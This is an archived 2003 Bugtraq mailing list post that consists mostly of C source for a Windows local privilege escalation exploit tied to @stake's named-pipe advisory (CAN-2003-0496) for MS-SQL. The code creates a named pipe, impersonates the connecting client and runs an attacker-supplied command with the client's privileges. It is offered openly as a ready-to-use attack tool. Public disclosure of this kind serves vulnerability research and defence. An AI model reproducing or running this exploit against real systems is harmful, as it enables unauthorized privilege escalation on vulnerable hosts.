lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <web-13947830@gator.darkhorse.com>
Date: Mon, 14 Jul 2003 07:26:04 -0700
From: "wirepair" <wirepair@...uemail.net>
To: bugtraq@...urityfocus.com
Subject: @stake named pipe exploit


Follow @stakes advisory...
/*  tac0tac0.c - pay no attention to the name, long 
story...
  *
  *  Author:  Maceo 
  *  Modified to take advantage of CAN-2003-0496 Named 
Pipe Filename 
  *  Local Privilege Escalation Found by @stake. Use with 
their Advisory.
  *  -wirepair@...dan.org http://sh0dan.org
  *
  *  
  *  All credits for code go to Maceo, i really did 
minimal work
  *  with his code, it took me like 3 seconds heh.
  *  Shouts to #innercircle, 
  *
  */


#include <stdio.h>
#include <windows.h>


int main(int argc, char **argv)
{
   DWORD dwNumber = 0;
   DWORD dwType = REG_DWORD;
   DWORD dwSize = sizeof(DWORD);

   if (argc != 2) {
	  fprintf(stderr, "Usage: %s <cmd.exe>\nNamed Pipe Local 
Priv Escalation found by @stake.\n"
					   "This code is to be used with MS-SQL exactly as 
outlined in their advisory\n"
					   "All credit for this code goes to Maceo, he did a 
fine job.. -wire\n",argv[0]);
					   exit(1);
   }
   // build the next named pipe name //
   char szPipe[64];
   //sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", 
++dwNumber);
   sprintf(szPipe, "\\\\.\\pipe\\poop");

   // create the named pipe before scm can //
   HANDLE hPipe = 0;
   hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                            PIPE_TYPE_MESSAGE|PIPE_WAIT,
                            2, 0, 0, 0, NULL);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
     printf ("Failed to create named pipe:\n  %s\n", 
szPipe);
     return 3;
   }


   ConnectNamedPipe (hPipe, NULL);

   // assume the identity of the client //
   if (!ImpersonateNamedPipeClient (hPipe))
   {
     printf ("Failed to impersonate the named pipe.\n");
     CloseHandle(hPipe);
     return 5;
   }


   // display impersonating users name //
   dwSize  = 256;
   char szUser[256];
   GetUserName(szUser, &dwSize);
   printf ("Impersonating: %s\n", szUser);

   system(argv[1]);
   CloseHandle(hPipe);
   return 0;
}
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ